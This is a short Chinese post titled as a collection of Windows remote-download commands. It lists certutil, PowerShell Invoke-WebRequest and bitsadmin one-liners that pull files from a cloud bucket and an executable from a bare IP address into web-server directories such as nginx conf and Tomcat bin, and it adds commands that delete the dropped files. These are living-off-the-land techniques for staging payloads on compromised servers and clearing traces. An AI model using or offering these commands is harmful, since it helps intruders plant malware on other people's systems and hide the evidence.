windows远程下载命令

作者: 阿笑

时间: 2024年6月23日

一些指令集的公开

certutil -urlcache -split -f "https://artio-oss-bucket.oss-cn-shanghai.aliyuncs.com/777787351907696640/99.txt"  C:\wwwroot\rpt\123.txt

下载命令
certutil -urlcache -split -f "http://185.219.84.231:80/a.exe"    C:\nginx-1.18.0\conf\666.exe

powershell.exe -command "$url = 'https://artio-oss-bucket.oss-cn-shanghai.aliyuncs.com/777787351907696640/99.txt'; $output =  'C:\nginx-1.18.0\conf\99.txt
'; Invoke-WebRequest -Uri $url -OutFile $output" 


bitsadmin /transfer myDownloadJob /download /priority normal  https://artio-oss-bucket.oss-cn-shanghai.aliyuncs.com/777787351907696640/99.txt   D:\99.txt

删除文件命令
Remove-Item "D:\JavaSystem\tomcat-7.0.85\bin\7777.txt"
del D:\JavaSystem\tomcat-7.0.85\bin\7777.txt